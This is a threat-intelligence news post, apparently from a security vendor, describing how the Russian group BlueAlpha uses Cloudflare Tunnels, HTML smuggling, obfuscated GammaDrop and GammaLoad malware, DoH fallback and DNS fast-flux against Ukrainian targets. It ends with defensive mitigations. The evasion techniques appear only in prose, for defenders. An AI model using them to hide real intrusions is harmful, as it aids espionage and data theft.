BlueAlpha, a Russian hacking group, is using Cloudflare Tunnels, a service that masks the origin of internet traffic, to hide its attacks on Ukrainian organizations
BlueAlpha, a Russian hacking group, is using Cloudflare Tunnels, a service that masks the origin of internet traffic, to hide its attacks on Ukrainian organizations. This makes it difficult to trace the source of the attack and allows malware to spread undetected.
About BlueAlpha
BlueAlpha, a Russian cyber-espionage group linked to the FSB, has been active since 2013. They use advanced custom malware like GammaLoad and GammaDrop to infiltrate networks undetected, often making use of legitimate services like Cloudflare to maintain long-term access. Their recent operations are part of a broader trend of Russian state-sponsored cyber activities aimed at gathering intelligence and disrupting adversaries.
Attack Flow
Such attacks typically begin with a spear-phishing email containing a malicious attachment. The attachment often uses HTML smuggling, embedding the malware inside an HTML file to bypass email security filters. When opened, the attachment executes a script, which downloads the GammaDrop payload from a server hidden behind a Cloudflare Tunnel.
To avoid detection, the malware is obfuscated with random junk code and misleading variable names. Once executed, GammaDrop connects to the attacker’s command-and-control (C2) server within the Cloudflare Tunnel, creating a persistent link for data exfiltration, credential theft, and backdoor access to networks.
GammaDrop serves as the initial payload, triggering the deployment of GammaLoad, the custom backdoor used by BlueAlpha to maintain long-term access. The GammaLoad variant observed in this campaign is VBScript-based. The backdoor leverages DNS over HTTPS (DoH), alongside traditional DNS resolution, to contact C2 infrastructure.
If traditional DNS fails, GammaLoad uses DoH providers like Google and Cloudflare to resolve C2 domains, making the attack more resilient to DNS-based blocking techniques. Additionally, BlueAlpha employs DNS fast-fluxing, frequently changing the IP addresses associated with the C2 infrastructure, further complicating efforts to trace or block the malicious activity.
Mitigation (as recommended by Insikt Group)
- Enhance email security to detect and block HTML smuggling, particularly in attachments with suspicious events like onerror and onmousemove.
- Prevent unauthorized execution of mshta.exe and block untrusted .lnk files. Monitor mshta.exe activity for abnormal behavior, especially related to external downloads.
- Establish network monitoring rules that specifically flag and examine traffic to TryCloudflare subdomains, which are increasingly exploited for malicious activities.
- Enable logging of DoH traffic and implement policies to detect unauthorized DoH connections.
- Utilize Threat Intelligence and SecOps Intelligence sources to identify potential threats targeting your organization and its partners.
Want your digital assets to be protected?
CyberShelter provides innovative and modern cybersecurity products and niche services to individuals and organization against all kinds of cyber threats.
For the latest cyber threats and the latest hacking news please follow us on Facebook, Linkedin, and Twitter.